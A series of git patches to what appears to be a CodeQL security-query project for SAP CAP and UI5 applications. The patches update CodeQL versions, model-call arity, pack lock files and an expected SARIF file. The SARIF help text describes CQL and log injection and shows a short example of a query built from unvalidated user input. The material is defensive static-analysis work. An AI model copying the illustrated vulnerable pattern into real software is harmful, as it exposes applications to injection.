"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, 
@@ -52112,7 +25926,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52130,7 +25944,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52148,7 +25962,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -52170,7 +25984,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52188,7 +26002,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52206,7 +26020,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52224,7 +26038,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, 
@@ -52242,7 +26056,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52260,7 +26074,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52278,7 +26092,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -52299,7 +26113,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 6, @@ -52316,7 +26130,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52370,4 +26184,4 @@ "semmle.formatSpecifier" : "sarif-latest" } } ] -} +} \ No newline at end of file From b569d0fa7bcdea7126d0c3d0e32586739fb49b67 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 20:28:03 +0200 Subject: [PATCH 11/15] Update CodeQL to 2.17.3 --- .../frameworks/ui5/RemoteFlowSources.qll | 2 +- .../javascript/frameworks/ui5/UI5View.qll | 16 ++++++++-------- qlt.conf.json | 6 +++--- 3 files changed, 12 insertions(+), 12 deletions(-) diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll index ccfd09f1d..6669b8ffb 100644 
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
@@ -7,7 +7,7 @@ private class DataFromRemoteControlReference extends RemoteFlowSource, MethodCal
DataFromRemoteControlReference() {
exists(UI5Control sourceControl, string typeAlias, ControlReference controlReference |
ApiGraphModelsExtensions::typeModel(typeAlias, sourceControl.getImportPath(), _) and
- ApiGraphModelsExtensions::sourceModel(typeAlias, _, "remote") and
+ ApiGraphModelsExtensions::sourceModel(typeAlias, _, "remote", _) and
sourceControl.getAReference() = controlReference and
controlReference.flowsTo(this.getReceiver()) and
this.getMethodName() = "getValue"
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index b80bb89c5..789322867 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -329,7 +329,7 @@ class JsView extends UI5View {
exists(DataFlow::ObjectLiteralNode control, string type, string path, string property |
this = control.getFile() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and
+ ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBinding().getBindingTarget().asDataFlowNode() = control.getAPropertyWrite(property)
)
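Review bot: The updated `sourceModel`/`sinkModel` calls wildcard the new fourth argument with `_` in eight near-identical places (this hunk and the -339, -382, -392, -533, -543, -659 and -669 hunks of UI5View.qll), so the next arity change in the standard library will again need eight hand edits; a private helper such as `private predicate ui5SourceModel(string type, string path) { ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) }` with a matching sink helper would put the model lookup in one place. A short comment on that helper saying which column the `_` discards (presumably the provenance added in the newer library — confirm against the 2.17.3 definition) would also tell future readers why it is intentionally ignored. Each enclosing predicate starts outside its hunk.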
@@ -339,7 +339,7 @@ class JsView extends UI5View {
exists(DataFlow::ObjectLiteralNode control, string type, string path, string property |
this = control.getFile() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and
+ ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBinding().getBindingTarget().asDataFlowNode() = control.getAPropertyWrite(property)
)
@@ -382,7 +382,7 @@ class JsonView extends UI5View {
exists(JsonObject control, string type, string path, string property |
root = control.getParent+() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and
+ ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBindingTarget() = control
)
@@ -392,7 +392,7 @@ class JsonView extends UI5View {
exists(JsonObject control, string type, string path, string property |
root = control.getParent+() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and
+ ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBindingTarget() = control
)
@@ -533,7 +533,7 @@ class HtmlView extends UI5View, HTML::HtmlFile {
exists(HTML::Element control, string type, string path, string property |
this = control.getFile() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and
+ ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBindingTarget() = control.getAttributeByName("data-" + property)
)
@@ -543,7 +543,7 @@ class HtmlView extends UI5View, HTML::HtmlFile {
exists(HTML::Element control, string type, string path, string property |
this = control.getFile() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and
+ ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBindingTarget() = control.getAttributeByName("data-" + property)
)
@@ -659,7 +659,7 @@ class XmlView extends UI5View instanceof XmlFile {
exists(XmlElement control, string type, string path, string property |
this = control.getFile() and
type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote") and
+ ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and
property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
result.getBindingTarget() = control.getAttribute(property)
)
@@ -669,7 +669,7 @@ class XmlView extends UI5View instanceof XmlFile {
 exists(XmlElement control, string type, string path, string property |
 this = control.getFile() and
 type = result.getControlTypeName() and
- ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection") and
+ ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
 property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
 result.getBindingTarget() = control.getAttribute(property) and
 /* If the control is an `sap.ui.core.HTML` then the control should be missing the `sanitizeContent` attribute */
diff --git a/qlt.conf.json b/qlt.conf.json
index 1db9ad4a8..e33a2227f 100644
--- a/qlt.conf.json
+++ b/qlt.conf.json
@@ -1,5 +1,5 @@
 {
- "CodeQLCLI": "2.15.1",
- "CodeQLStandardLibrary": "codeql-cli/v2.15.1",
- "CodeQLCLIBundle": "codeql-bundle-v2.15.1"
+ "CodeQLCLI": "2.17.3",
+ "CodeQLStandardLibrary": "codeql-cli/v2.17.3",
+ "CodeQLCLIBundle": "codeql-bundle-v2.17.3"
 }
\ No newline at end of file
From d8d870faeeac46aa4bbc004b1138dd5423b70568 Mon Sep 17 00:00:00 2001
From: Mauro Baluda
Date: Wed, 22 May 2024 21:08:26 +0200
Subject: [PATCH 12/15] Update qlpack files
---
 javascript/frameworks/cap/ext/qlpack.yml | 6 ++---
 .../frameworks/cap/lib/codeql-pack.lock.yml | 20 +++++++-------
 javascript/frameworks/cap/lib/qlpack.yml | 2 +-
 .../frameworks/cap/src/codeql-pack.lock.yml | 20 +++++++-------
 javascript/frameworks/cap/src/qlpack.yml | 4 +--
 .../frameworks/cap/test/codeql-pack.lock.yml | 26 ++++++++++---------
 javascript/frameworks/cap/test/qlpack.yml | 12 ++++-----
 javascript/frameworks/ui5/ext/qlpack.yml | 2 +-
 .../frameworks/ui5/lib/codeql-pack.lock.yml | 20 +++++++-------
 javascript/frameworks/ui5/lib/qlpack.yml | 2 +-
 .../frameworks/ui5/src/codeql-pack.lock.yml | 20 +++++++-------
 javascript/frameworks/ui5/src/qlpack.yml | 2 +-
 .../frameworks/ui5/test/codeql-pack.lock.yml | 26 ++++++++++---------
 javascript/frameworks/ui5/test/qlpack.yml | 4 +--
 javascript/heuristic-models/ext/qlpack.yml | 4 +--
 .../tests/codeql-pack.lock.yml | 20 +++++++++-----
 javascript/heuristic-models/tests/qlpack.yml | 4 +--
 scripts/codeql-pack.lock.yml | 20 +++++++-------
 scripts/qlpack.yml | 2 +-
 19 files changed, 119 insertions(+), 97 deletions(-)
diff --git a/javascript/frameworks/cap/ext/qlpack.yml b/javascript/frameworks/cap/ext/qlpack.yml
index aa45e5fff..b0f8bc25e 100644
--- a/javascript/frameworks/cap/ext/qlpack.yml
+++ b/javascript/frameworks/cap/ext/qlpack.yml
@@ -3,7 +3,7 @@ library: true
 name: advanced-security/javascript-sap-cap-models
 version: 0.2.0
 extensionTargets:
- codeql/javascript-all: "^0.8.7"
- codeql/javascript-queries: "^0.8.7"
+ codeql/javascript-all: "^0.9.1"
+ codeql/javascript-queries: "^0.8.16"
 dataExtensions:
- - "*.model.yml"
\ No newline at end of file
+ - "*.model.yml"
diff --git a/javascript/frameworks/cap/lib/codeql-pack.lock.yml b/javascript/frameworks/cap/lib/codeql-pack.lock.yml
index e17706661..9c7802785 100644
--- a/javascript/frameworks/cap/lib/codeql-pack.lock.yml
+++ b/javascript/frameworks/cap/lib/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/lib/qlpack.yml b/javascript/frameworks/cap/lib/qlpack.yml index 27b474893..0938ebaed 100644 --- a/javascript/frameworks/cap/lib/qlpack.yml +++ b/javascript/frameworks/cap/lib/qlpack.yml @@ -5,5 +5,5 @@ version: 0.2.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-cap-models: "^0.2.0" diff --git a/javascript/frameworks/cap/src/codeql-pack.lock.yml b/javascript/frameworks/cap/src/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/cap/src/codeql-pack.lock.yml +++ b/javascript/frameworks/cap/src/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/src/qlpack.yml b/javascript/frameworks/cap/src/qlpack.yml index d9faa87d1..9dc2fdd1f 100644 
--- a/javascript/frameworks/cap/src/qlpack.yml +++ b/javascript/frameworks/cap/src/qlpack.yml @@ -5,7 +5,7 @@ version: 0.2.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-cap-models: "^0.2.0" advanced-security/javascript-sap-cap-all: "^0.2.0" -default-suite-file: codeql-suites/javascript-code-scanning.qls \ No newline at end of file +default-suite-file: codeql-suites/javascript-code-scanning.qls diff --git a/javascript/frameworks/cap/test/codeql-pack.lock.yml b/javascript/frameworks/cap/test/codeql-pack.lock.yml index cddccdcf6..09a0ed7e9 100644 --- a/javascript/frameworks/cap/test/codeql-pack.lock.yml +++ b/javascript/frameworks/cap/test/codeql-pack.lock.yml @@ -2,27 +2,29 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/javascript-queries: - version: 0.8.7 + version: 0.8.16 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/suite-helpers: - version: 0.7.7 + version: 0.7.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/typos: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/cap/test/qlpack.yml b/javascript/frameworks/cap/test/qlpack.yml index aac199b10..8d504ba31 100644 --- a/javascript/frameworks/cap/test/qlpack.yml +++ b/javascript/frameworks/cap/test/qlpack.yml 
@@ -1,10 +1,10 @@ --- name: advanced-security/javascript-sap-cap-queries-tests -version: 0.1.0 +version: 0.2.0 extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" - codeql/javascript-queries: "^0.8.7" - advanced-security/javascript-sap-cap-queries: "^0.1.0" - advanced-security/javascript-sap-cap-models: "^0.1.0" - advanced-security/javascript-sap-cap-all: "^0.1.0" \ No newline at end of file + codeql/javascript-all: "^0.9.1" + codeql/javascript-queries: "^0.8.16" + advanced-security/javascript-sap-cap-queries: "^0.2.0" + advanced-security/javascript-sap-cap-models: "^0.2.0" + advanced-security/javascript-sap-cap-all: "^0.2.0" diff --git a/javascript/frameworks/ui5/ext/qlpack.yml b/javascript/frameworks/ui5/ext/qlpack.yml index 0640d17a9..2bb7c39a1 100644 --- a/javascript/frameworks/ui5/ext/qlpack.yml +++ b/javascript/frameworks/ui5/ext/qlpack.yml @@ -3,6 +3,6 @@ library: true name: advanced-security/javascript-sap-ui5-models version: 0.6.0 extensionTargets: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" dataExtensions: - "*.model.yml" diff --git a/javascript/frameworks/ui5/lib/codeql-pack.lock.yml b/javascript/frameworks/ui5/lib/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/ui5/lib/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/lib/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false 
diff --git a/javascript/frameworks/ui5/lib/qlpack.yml b/javascript/frameworks/ui5/lib/qlpack.yml index 7d9713250..df65416bf 100644 --- a/javascript/frameworks/ui5/lib/qlpack.yml +++ b/javascript/frameworks/ui5/lib/qlpack.yml @@ -5,5 +5,5 @@ version: 0.6.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-ui5-models: "^0.6.0" diff --git a/javascript/frameworks/ui5/src/codeql-pack.lock.yml b/javascript/frameworks/ui5/src/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/javascript/frameworks/ui5/src/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/src/codeql-pack.lock.yml @@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/ui5/src/qlpack.yml b/javascript/frameworks/ui5/src/qlpack.yml index afbb000c8..814a3dadb 100644 --- a/javascript/frameworks/ui5/src/qlpack.yml +++ b/javascript/frameworks/ui5/src/qlpack.yml @@ -5,7 +5,7 @@ version: 0.6.0 suites: codeql-suites extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" + codeql/javascript-all: "^0.9.1" advanced-security/javascript-sap-ui5-models: "^0.6.0" advanced-security/javascript-sap-ui5-all: "^0.6.0" default-suite-file: codeql-suites/javascript-code-scanning.qls diff --git a/javascript/frameworks/ui5/test/codeql-pack.lock.yml b/javascript/frameworks/ui5/test/codeql-pack.lock.yml index cddccdcf6..09a0ed7e9 100644 
--- a/javascript/frameworks/ui5/test/codeql-pack.lock.yml +++ b/javascript/frameworks/ui5/test/codeql-pack.lock.yml @@ -2,27 +2,29 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/javascript-queries: - version: 0.8.7 + version: 0.8.16 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/suite-helpers: - version: 0.7.7 + version: 0.7.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/typos: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/javascript/frameworks/ui5/test/qlpack.yml b/javascript/frameworks/ui5/test/qlpack.yml index 67876fb97..45b3cef98 100644 --- a/javascript/frameworks/ui5/test/qlpack.yml +++ b/javascript/frameworks/ui5/test/qlpack.yml @@ -2,8 +2,8 @@ name: advanced-security/javascript-sap-ui5-queries-tests version: 0.6.0 extractor: javascript dependencies: - codeql/javascript-all: "^0.8.7" - codeql/javascript-queries: "^0.8.7" + codeql/javascript-all: "^0.9.1" + codeql/javascript-queries: "^0.8.16" advanced-security/javascript-sap-ui5-queries: "^0.6.0" advanced-security/javascript-sap-ui5-models: "^0.6.0" advanced-security/javascript-sap-ui5-all: "^0.6.0" diff --git a/javascript/heuristic-models/ext/qlpack.yml b/javascript/heuristic-models/ext/qlpack.yml index 00cc2bc4e..3250c91d9 100644 --- a/javascript/heuristic-models/ext/qlpack.yml +++ b/javascript/heuristic-models/ext/qlpack.yml @@ -1,9 +1,9 @@ --- -library: true +library: true warnOnImplicitThis: false name: advanced-security/javascript-heuristic-models version: 0.0.1 extensionTargets: codeql/javascript-all: "*" dataExtensions: - - "*.model.yml" \ No newline at end of file + - "*.model.yml" 
diff --git a/javascript/heuristic-models/tests/codeql-pack.lock.yml b/javascript/heuristic-models/tests/codeql-pack.lock.yml index 0c51b170f..9c7802785 100644 --- a/javascript/heuristic-models/tests/codeql-pack.lock.yml +++ b/javascript/heuristic-models/tests/codeql-pack.lock.yml @@ -1,16 +1,24 @@ --- lockVersion: 1.0.0 dependencies: + codeql/dataflow: + version: 0.2.7 codeql/javascript-all: - version: 0.8.4 + version: 0.9.1 codeql/mad: - version: 0.2.4 + version: 0.2.16 codeql/regex: - version: 0.2.4 + version: 0.2.16 + codeql/ssa: + version: 0.2.16 codeql/tutorial: - version: 0.2.4 + version: 0.2.16 + codeql/typetracking: + version: 0.2.16 codeql/util: - version: 0.2.4 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.4 + version: 0.2.16 compiled: false diff --git a/javascript/heuristic-models/tests/qlpack.yml b/javascript/heuristic-models/tests/qlpack.yml index 4411fb5d0..0c28db69a 100644 --- a/javascript/heuristic-models/tests/qlpack.yml +++ b/javascript/heuristic-models/tests/qlpack.yml @@ -1,8 +1,8 @@ -library: false +library: false warnOnImplicitThis: false name: advanced-security/javascript-heuristic-models-tests version: 0.0.1 extractor: javascript dependencies: "codeql/javascript-all": "*" - "advanced-security/javascript-heuristic-models": "*" \ No newline at end of file + "advanced-security/javascript-heuristic-models": "*" diff --git a/scripts/codeql-pack.lock.yml b/scripts/codeql-pack.lock.yml index e17706661..9c7802785 100644 --- a/scripts/codeql-pack.lock.yml +++ b/scripts/codeql-pack.lock.yml 
@@ -2,21 +2,23 @@ lockVersion: 1.0.0 dependencies: codeql/dataflow: - version: 0.1.7 + version: 0.2.7 codeql/javascript-all: - version: 0.8.7 + version: 0.9.1 codeql/mad: - version: 0.2.7 + version: 0.2.16 codeql/regex: - version: 0.2.7 + version: 0.2.16 codeql/ssa: - version: 0.2.7 + version: 0.2.16 codeql/tutorial: - version: 0.2.7 + version: 0.2.16 codeql/typetracking: - version: 0.2.7 + version: 0.2.16 codeql/util: - version: 0.2.7 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.2.7 + version: 0.2.16 compiled: false diff --git a/scripts/qlpack.yml b/scripts/qlpack.yml index 3e088617d..cc022c1a5 100644 --- a/scripts/qlpack.yml +++ b/scripts/qlpack.yml @@ -4,4 +4,4 @@ warnOnImplicitThis: false name: advanced-security/jsdoc-extraction version: 0.0.1 dependencies: - codeql/javascript-all: "^0.8.7" \ No newline at end of file + codeql/javascript-all: "^0.9.1" From f3fcd633580879510968ae8fa934b09214f8e54b Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:20:53 +0200 Subject: [PATCH 13/15] Update expected sarif --- .github/workflows/javascript.sarif.expected | 20144 ++---------------- 1 file changed, 1403 insertions(+), 18741 deletions(-) diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected index f462b80fc..ae475cf03 100644 --- a/.github/workflows/javascript.sarif.expected +++ b/.github/workflows/javascript.sarif.expected @@ -6,7 +6,7 @@ "driver" : { "name" : "CodeQL", "organization" : "GitHub", - "semanticVersion" : "2.15.1", + "semanticVersion" : "2.17.3", "notifications" : [ { "id" : "cli/expected-extracted-files/javascript", "name" : "cli/expected-extracted-files/javascript", 
@@ -43,241 +43,8 @@ "rules" : [ ] }, "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
